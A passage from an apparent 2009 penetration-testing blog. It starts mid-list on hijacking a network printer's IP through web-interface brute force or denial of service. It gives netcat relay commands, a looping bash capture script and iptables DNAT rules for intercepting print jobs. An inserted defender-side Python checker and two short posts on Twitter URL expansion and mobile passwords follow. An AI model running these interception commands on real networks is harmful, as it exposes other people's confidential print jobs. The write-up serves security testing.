  3. Web server access – Most modern printers offer a web interface for easy configuration. Brute force is an option here as they rarely enforce lockouts or use domain credentials. Again, reset the IP address and assume the original.
  4. Denial of service – Crude but effective. This isn’t really a MITM attack, as you’d not be able to forward on the print job. Just drop the printer off the network (turn it off if you have to) and steal its IP.

Once you’ve gained access and taken over the IP address of the remote printer, there are a couple of ways to capture the print jobs. I started off by playing about with netcat using a simple netcat relay (and tcpdump to copy the traffic).

mknod backpipe p
nc -l -p 9100 0<backpipe | nc <new printer ip> 9100 0>backpipe

The problem with this is that it would work for the first print job and then lock up. This is because the netcat relay makes one connection and leaves it running, so all subsequent print jobs fail. Back to the drawing board.

My second attempt added the -w1 timeout to the second half of the netcat relay. This forces the connection to be dropped after 1 second of inactivity. This worked a little better, but still not perfectly. I also threw in tee to avoid having to use tcpdump to capture the traffic (-a tells tee to append).

mknod backpipe p
nc -l -p 9100 0<backpipe | tee -a capture.out | nc <new printer ip> -w1 9100 0>backpipe

The best results came from running the above command in a loop. I wrote a small bash script to do this. It’s something to play with (your mileage may vary).

#!/bin/bash
# Relay port 9100 to the real printer, saving each job to its own capture file.
i=1
PRNIP=10.10.10.10

# The relay needs the named pipe for the return path; create it if it is missing.
[ -p backpipe ] || mknod backpipe p

while true; do
echo "Print jobs captured = $i"
nc -l -p 9100 0<backpipe | tee -a capture-$i.out | nc $PRNIP -w1 9100 0>backpipe
# Arithmetic expansion; a plain i=$i+1 would only build the string "1+1+1..."
i=$((i+1))
done

As an alternative to netcat I also tested using iptables to redirect the traffic with a DNAT rule in the PREROUTING chain.

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -t nat -F
iptables -X
iptables -t nat -A PREROUTING -p tcp --dport 9100 -j DNAT --to-destination <new printer ip>

The problem I can see here is that PREROUTING is performed before any of the traffic will be visible to tcpdump. So although we’re routing all the traffic to the printer, we can’t dump any of the print jobs. I’m no iptables expert by any stretch of the imagination, so maybe there is a way to do this easily without extra tools. I’ll have to try playing with the mangle rules and see if I can get better results with iptables.
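From the other side of the fence, as an added example that is not part of the original post: a small Python check that flags the relay pattern above (a printer address answering from a new MAC, a printer IP opening its own 9100 connections, print traffic heading to a host that is not an inventoried printer) in connection and ARP records. The record formats, the printer inventory and the IP/MAC values are constructed for this example.

```python
# Added example, not the post's code: defender-side checks for the relay above.
# Constructed assumptions: PRINTERS maps inventoried printer IPs to known MACs;
# flow records are "src_ip dst_ip dst_port"; ARP observations are "ip mac".
RAW_PRINT_PORT = 9100  # port the netcat relay and the DNAT rule above operate on
def parse_fields(line, count):
    """Split a record into exactly `count` fields; None for junk lines."""
    parts = line.split()
    return parts if len(parts) == count else None

def audit_print_flows(flow_lines, printers):
    """Flag TCP/9100 flows that are not plain client -> inventoried printer:
    'printer_as_client' (a printer IP opening a 9100 connection, as the relay does
    once it holds that address) and 'unknown_printer' (print traffic to a host not
    in the inventory, where a moved printer or the relay's upstream shows up)."""
    findings = []
    for line in flow_lines:
        rec = parse_fields(line, 3)
        if rec is None or not rec[2].isdigit() or int(rec[2]) != RAW_PRINT_PORT:
            continue
        src, dst = rec[0], rec[1]
        if src in printers:
            findings.append(("printer_as_client", src, dst))
        if dst not in printers:
            findings.append(("unknown_printer", src, dst))
    return findings

def audit_arp(arp_lines, printers):
    """Flag an inventoried printer IP answering from a MAC other than the one on
    record; every takeover method listed above changes who answers for that IP."""
    findings = []
    for line in arp_lines:
        rec = parse_fields(line, 2)
        if rec is None:
            continue
        ip, mac = rec[0], rec[1].lower()
        if ip in printers and mac != printers[ip]:
            findings.append(("mac_changed", ip, mac))
    return findings

# Constructed sample; 10.10.10.20 is where the real printer lands once its address is taken.
PRINTERS = {"10.10.10.10": "00:11:22:33:44:55"}
FLOWS = ["10.10.10.55 10.10.10.10 9100",  # ordinary client print job
         "10.10.10.55 10.10.10.10 443",   # printer web UI, not a print flow
         "10.10.10.10 10.10.10.20 9100",  # relay at the stolen address, forwarding
         "not a flow record"]
ARP = ["10.10.10.10 00:11:22:33:44:55", "10.10.10.10 DE:AD:BE:EF:00:01"]

if __name__ == "__main__":
    for kind, a, b in audit_print_flows(FLOWS, PRINTERS) + audit_arp(ARP, PRINTERS):
        print(f"{kind}: {a} -> {b}")
```

Run against the sample, the relay line produces both flow findings and the second ARP observation produces the MAC change; the ordinary print job and the web UI connection produce nothing.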

Posted in Penetration Test, Technology | 1 Comment »

Twitter moves to protect against TinyURL attacks

Posted by ChrisJohnRiley on February 7, 2009

It’s been a topic of conversation for a while now: the use of TinyURLs within Twitter and other social media sites. For those of you who don’t know what a TinyURL is, I’ll give an example.

I want to post you a link to my website, but with Twitter I only have a maximum of 140 characters. To maximise the space and make things easier for users, the Twitter gods decided to convert the (usually) long links into a smaller link using the TinyURL service. You can check out the service for yourself. You simply paste in the long link and get back a smaller one that still works the same way.

FULL URL –> http://c22blog.wordpress.com/2009/02/07/mobile-devices-lowering-web-security/

TinyURL –> http://tinyurl.com/btsfs5

As you can see, the second one is a lot easier to read and pass on. Anyway, back to the point at hand.

Twitter have implemented a new feature (currently restricted to their search.twitter.com area) that adds an [expand] button after the TinyURL. As you can imagine, this allows you to expand the link and see where it really points. This is obviously a good thing for security, as you never know where that TinyURL could take you. XSS attacks are all around us ;)

[Screenshot: expand link on search.twitter.com]

[Screenshot: contract link on search.twitter.com]

Here’s hoping that the feature comes to the standard Twitter time-line soon.

Posted in Security, Technology | Leave a Comment »

Mobile devices lowering web security

Posted by ChrisJohnRiley on February 7, 2009

It’s been over a month now since I finally made the move to an iPhone. For the last 6 months or so I’ve been using a BlackBerry (with mixed results), but this was mostly business use. The one thing that struck me when I started using the iPhone for Internet use, reading blogs, and accessing services like Twitter, was the keyboard. I know it sounds strange, but having to click through 3 different menus just to get to the special keys portion of the keyboard puts a serious dent in your typing speed. Once you’re used to things, it’s OK to work with. However, this started me thinking how many average users of the iPhone (or BlackBerry, Nokia, G1, <insert current mobile device of the week here>) have given up constantly typing their suitably complex web-mail or forum password and changed it to something easier and quicker to enter on a mobile keypad.

With things constantly moving towards mobile computing (like it or not), the input of passwords will become more and more of an issue. Devices are getting smaller and smaller, and keyboard input is moving from the standard layout to miniature input, gestures, and handwriting recognition. These are difficult enough to deal with as it is, without having to make sure you get it 100% correct. After all, you can’t have a spelling mistake in your password and get away with it.

So, how long before we start to see a shift in password use on web services to more mobile-friendly passwords? For example, those displayed on the main iPhone keypad. This means no special characters or numbers. Unless the web service forces strong passwords, users will go with convenience over security most of the time. This is just human nature. This increasingly limited input range will make it easier to brute-force the passwords of mobile users and reduce overall security, just as we’ve finally started to get the general public to embrace complex passwords. One step forward, and two steps back.

Hopefully this doesn’t spell a return to the use of “god”, “sex”, “love” and “secret” as our main passwords of choice.

Posted in Security, Technology | 2 Comments »